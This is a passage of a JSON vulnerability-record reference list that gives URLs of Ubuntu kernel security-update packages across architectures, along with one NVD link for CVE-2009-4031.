        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4031"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
